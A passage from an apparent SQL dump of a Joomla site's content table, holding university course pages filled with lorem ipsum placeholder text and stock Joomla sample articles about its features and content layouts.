class=\"icon_check_sign\">\r\n<li>Microeconomics</li>\r\n<li>Macroeconomics</li>\r\n<li>Quantitative Methods in Economics</li>\r\n<li>Political and Sociological Aspects of Economics</li>\r\n<li>British Economic History</li>\r\n</ul>\r\n<p> </p>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor.</p>\r\n<p> </p>\r\n<h4>Year 02 (Part IIA)</h4>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam.</p>\r\n<p> </p>\r\n<ul class=\"icon_check_sign\">\r\n<li>Microeconomics</li>\r\n<li>Macroeconomics</li>\r\n<li>Quantitative Methods in Economics</li>\r\n<li>Political and Sociological Aspects of Economics</li>\r\n<li>British Economic History</li>\r\n</ul>\r\n<p> </p>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor.</p>','',-2,0,0,19,'2013-09-30 11:52:33',135,'','2013-10-03 06:07:29',135,0,'0000-00-00 00:00:00','2013-09-30 11:52:33','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,0,5,'','',1,151,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(77,137,'Laboratory','laboratory','','<h3>overview</h3>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor.in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.</p>\r\n<h3>Year 01 (Part IA)</h3>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam.</p>\r\n<ul>\r\n<li>[icon name=\"icon-ok\"/] Microeconomics</li>\r\n<li>[icon name=\"icon-ok\"/] Macroeconomics</li>\r\n<li>[icon name=\"icon-ok\"/] Quantitative Methods in Economics</li>\r\n<li>[icon name=\"icon-ok\"/] Political and Sociological Aspects of Economics</li>\r\n<li>[icon name=\"icon-ok\"/] British Economic History</li>\r\n</ul>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor.</p>\r\n<h3>Year 02 (Part IIA)</h3>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam.</p>\r\n<ul>\r\n<li>[icon name=\"icon-ok\"/] Microeconomics</li>\r\n<li>[icon name=\"icon-ok\"/] Macroeconomics</li>\r\n<li>[icon name=\"icon-ok\"/] Quantitative Methods in Economics</li>\r\n<li>[icon name=\"icon-ok\"/] Political and Sociological Aspects of Economics</li>\r\n<li>[icon name=\"icon-ok\"/] British Economic History</li>\r\n</ul>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor.</p>','',-2,0,0,2,'2013-09-30 11:52:54',135,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2013-09-30 11:52:54','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,0,9,'','',1,532,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(78,138,'Human Physiology','human-physiology','','<p> </p>\r\n<h4>Overview</h4>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor.in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.</p>\r\n<p> </p>\r\n<h4>Year 01 (Part IA)</h4>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam.</p>\r\n<p> </p>\r\n<ul class=\"icon_check_sign\">\r\n<li>Microeconomics</li>\r\n<li>Macroeconomics</li>\r\n<li>Quantitative Methods in Economics</li>\r\n<li>Political and Sociological Aspects of Economics</li>\r\n<li>British Economic History</li>\r\n</ul>\r\n<p> </p>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor.</p>\r\n<p> </p>\r\n<h4>Year 02 (Part IIA)</h4>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam.</p>\r\n<p> </p>\r\n<ul class=\"icon_check_sign\">\r\n<li>Microeconomics</li>\r\n<li>Macroeconomics</li>\r\n<li>Quantitative Methods in Economics</li>\r\n<li>Political and Sociological Aspects of Economics</li>\r\n<li>British Economic History</li>\r\n</ul>\r\n<p> </p>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor.</p>','',-2,0,0,19,'2013-09-30 11:53:25',135,'','2013-10-03 06:07:08',135,0,'0000-00-00 00:00:00','2013-09-30 11:53:25','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,0,4,'','',1,361,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(79,139,'Plant Biochemistry','plant-biochemistry','','<p> </p>\r\n<h4>Overview</h4>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor.in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.</p>\r\n<p> </p>\r\n<h4>Year 01 (Part IA)</h4>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam.</p>\r\n<p> </p>\r\n<ul class=\"icon_check_sign\">\r\n<li>Microeconomics</li>\r\n<li>Macroeconomics</li>\r\n<li>Quantitative Methods in Economics</li>\r\n<li>Political and Sociological Aspects of Economics</li>\r\n<li>British Economic History</li>\r\n</ul>\r\n<p> </p>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor.</p>\r\n<p> </p>\r\n<h4>Year 02 (Part IIA)</h4>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam.</p>\r\n<p> </p>\r\n<ul class=\"icon_check_sign\">\r\n<li>Microeconomics</li>\r\n<li>Macroeconomics</li>\r\n<li>Quantitative Methods in Economics</li>\r\n<li>Political and Sociological Aspects of Economics</li>\r\n<li>British Economic History</li>\r\n</ul>\r\n<p> </p>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor.</p>','',-2,0,0,19,'2013-09-30 11:53:53',135,'','2013-10-03 06:06:49',135,0,'0000-00-00 00:00:00','2013-09-30 11:53:53','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,0,3,'','',1,925,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(80,140,'Biochemical Immunology','biochemical-immunology','','<p> </p>\r\n<h4>Overview</h4>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor.in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.</p>\r\n<p> </p>\r\n<h4>Year 01 (Part IA)</h4>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam.</p>\r\n<p> </p>\r\n<ul class=\"icon_check_sign\">\r\n<li>Microeconomics</li>\r\n<li>Macroeconomics</li>\r\n<li>Quantitative Methods in Economics</li>\r\n<li>Political and Sociological Aspects of Economics</li>\r\n<li>British Economic History</li>\r\n</ul>\r\n<p> </p>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor.</p>\r\n<p> </p>\r\n<h4>Year 02 (Part IIA)</h4>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam.</p>\r\n<p> </p>\r\n<ul class=\"icon_check_sign\">\r\n<li>Microeconomics</li>\r\n<li>Macroeconomics</li>\r\n<li>Quantitative Methods in Economics</li>\r\n<li>Political and Sociological Aspects of Economics</li>\r\n<li>British Economic History</li>\r\n</ul>\r\n<p> </p>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor.</p>','',-2,0,0,19,'2013-09-30 11:54:28',135,'','2013-10-03 06:05:20',135,0,'0000-00-00 00:00:00','2013-09-30 11:54:28','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,0,2,'','',1,370,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(81,141,'Bioinformatics','bioinformatics','','<p> </p>\r\n<h4>Overview</h4>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor.in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.</p>\r\n<p> </p>\r\n<h4>Year 01 (Part IA)</h4>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam.</p>\r\n<p> </p>\r\n<ul class=\"icon_check_sign\">\r\n<li>Microeconomics</li>\r\n<li>Macroeconomics</li>\r\n<li>Quantitative Methods in Economics</li>\r\n<li>Political and Sociological Aspects of Economics</li>\r\n<li>British Economic History</li>\r\n</ul>\r\n<p> </p>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor.</p>\r\n<p> </p>\r\n<h4>Year 02 (Part IIA)</h4>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam.</p>\r\n<p> </p>\r\n<ul class=\"icon_check_sign\">\r\n<li>Microeconomics</li>\r\n<li>Macroeconomics</li>\r\n<li>Quantitative Methods in Economics</li>\r\n<li>Political and Sociological Aspects of Economics</li>\r\n<li>British Economic History</li>\r\n</ul>\r\n<p> </p>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor.</p>','',-2,0,0,19,'2013-09-30 11:55:08',135,'','2013-10-03 06:05:28',135,0,'0000-00-00 00:00:00','2013-09-30 11:55:08','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,0,1,'','',1,319,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(82,142,'Economic principles','economic-principles','','<p> </p>\r\n<h4>Overview</h4>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor.in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.</p>\r\n<p> </p>\r\n<h4>Year 01 (Part IA)</h4>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam.</p>\r\n<p> </p>\r\n<ul class=\"icon_check_sign\">\r\n<li>Microeconomics</li>\r\n<li>Macroeconomics</li>\r\n<li>Quantitative Methods in Economics</li>\r\n<li>Political and Sociological Aspects of Economics</li>\r\n<li>British Economic History</li>\r\n</ul>\r\n<p> </p>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor.</p>\r\n<p> </p>\r\n<h4>Year 02 (Part IIA)</h4>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam.</p>\r\n<p> </p>\r\n<ul class=\"icon_check_sign\">\r\n<li>Microeconomics</li>\r\n<li>Macroeconomics</li>\r\n<li>Quantitative Methods in Economics</li>\r\n<li>Political and Sociological Aspects of Economics</li>\r\n<li>British Economic History</li>\r\n</ul>\r\n<p> </p>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor.</p>','',-2,0,0,19,'2013-09-30 11:55:24',135,'','2013-10-03 06:06:23',135,0,'0000-00-00 00:00:00','2013-09-30 11:55:24','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',15,0,0,'','',1,301,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(83,167,'Joomla! Features','joomla-features','','<h4><span style=\"color: #ff6600;\">Joomla! features:</span></h4>\n<ul>\n<li>Completely database driven site engines </li>\n<li>News, products, or services sections fully editable and manageable</li>\n<li>Topics sections can be added to by contributing Authors </li>\n<li>Fully customisable layouts including <em>left</em>, <em>center</em>, and <em>right </em>Menu boxes </li>\n<li>Browser upload of images to your own library for use anywhere in the site </li>\n<li>Dynamic Forum/Poll/Voting booth for on-the-spot results </li>\n<li>Runs on Linux, FreeBSD, MacOSX server, Solaris, and AIX','</li>\n</ul>\n<h4>Extensive Administration:</h4>\n<ul>\n<li>Change order of objects including news, FAQs, Articles etc. </li>\n<li>Random Newsflash generator </li>\n<li>Remote Author submission Module for News, Articles, FAQs, and Links </li>\n<li>Object hierarchy - as many Sections, departments, divisions, and pages as you want </li>\n<li>Image library - store all your PNGs, PDFs, DOCs, XLSs, GIFs, and JPEGs online for easy use </li>\n<li>Automatic Path-Finder. Place a picture and let Joomla! fix the link </li>\n<li>News Feed Manager. Easily integrate news feeds into your Web site.</li>\n<li>E-mail a friend and Print format available for every story and Article </li>\n<li>In-line Text editor similar to any basic word processor software </li>\n<li>User editable look and feel </li>\n<li>Polls/Surveys - Now put a different one on each page </li>\n<li>Custom Page Modules. Download custom page Modules to spice up your site </li>\n<li>Template Manager. Download Templates and implement them in seconds </li>\n<li>Layout preview. See how it looks before going live </li>\n<li>Banner Manager. Make money out of your site.</li>\n</ul>',-2,0,0,40,'2008-08-08 23:32:45',135,'','2011-11-30 17:14:53',135,0,'0000-00-00 00:00:00','2006-10-07 06:00:00','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_vote\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',13,0,0,'','',1,0,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(84,168,'Joomla! Overview','joomla-overview','','<p>If you\'re new to Web publishing systems, you\'ll find that Joomla! delivers sophisticated solutions to your online needs. It can deliver a robust enterprise-level Web site, empowered by endless extensibility for your bespoke publishing needs. Moreover, it is often the system of choice for small business or home users who want a professional looking site that\'s simple to deploy and use. <em>We do content right</em>.</p>\n<p>So what\'s the catch? How much does this system cost?</p>\n<p>Well, there\'s good news ... and more good news! Joomla! 1.5 is free, it is released under an Open Source license - the GNU/General Public License v 2.0. Had you invested in a mainstream, commercial alternative, there\'d be nothing but moths left in your wallet and to add new functionality would probably mean taking out a second mortgage each time you wanted something adding!</p>\n<p>Joomla! changes all that ... <br />Joomla! is different from the normal models for content management software. For a start, it\'s not complicated. Joomla! has been developed for everybody, and anybody can develop it further. It is designed to work (primarily) with other Open Source, free, software such as PHP, MySQL, and Apache.</p>\n<p>It is easy to install and administer, and is reliable.</p>\n<p>Joomla! doesn\'t even require the user or administrator of the system to know HTML to operate it once it\'s up and running.</p>\n<p>To get the perfect Web site with all the functionality that you require for your particular application may take additional time and effort, but with the Joomla! Community support that is available and the many Third Party Developers actively creating and releasing new Extensions for the 1.5 platform on an almost daily basis, there is likely to be something out there to meet your needs. Or you could develop your own Extensions and make these available to the rest of the community.</p>','',-2,0,0,40,'2008-08-09 07:49:20',135,'','2011-11-30 17:14:18',135,0,'0000-00-00 00:00:00','2006-10-07 10:00:00','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_vote\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',15,0,0,'','',1,0,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(85,169,'Content Layouts','content-layouts','','<p>Joomla! provides plenty of flexibility when displaying your Web content. Whether you are using Joomla! for a blog site, news or a Web site for a company, you\'ll find one or more content styles to showcase your information. You can also change the style of content dynamically depending on your preferences. Joomla! calls how a page is laid out a <strong>layout</strong>. Use the guide below to understand which layouts are available and how you might use them.</p>\n<h2>Content</h2>\n<p>Joomla! makes it extremely easy to add and display content. All content is placed where your mainbody tag in your template is located. There are three main types of layouts available in Joomla! and all of them can be customised via parameters. The display and parameters are set in the Menu Item used to display the content your working on. You create these layouts by creating a Menu Item and choosing how you want the content to display.</p>\n<h3>Blog Layout</h3>\n<p>Blog layout will show a listing of all Articles of the selected blog type (Section or Category) in the mainbody position of your template. It will give you the standard title, and Intro of each Article in that particular Category and/or Section. You can customise this layout via the use of the Preferences and Parameters, (See Article Parameters) this is done from the Menu not the Section Manager!</p>\n<h3>Blog Archive Layout</h3>\n<p>A Blog Archive layout will give you a similar output of Articles as the normal Blog Display but will add, at the top, two drop down lists for month and year plus a search button to allow Users to search for all Archived Articles from a specific month and year.</p>\n<h3>List Layout</h3>\n<p>Table layout will simply give you a <em>tabular </em>list<em> </em>of all the titles in that particular Section or Category. No Intro text 